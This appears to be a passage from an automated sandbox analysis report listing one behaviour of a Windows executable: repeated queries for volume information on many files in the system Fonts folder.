Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
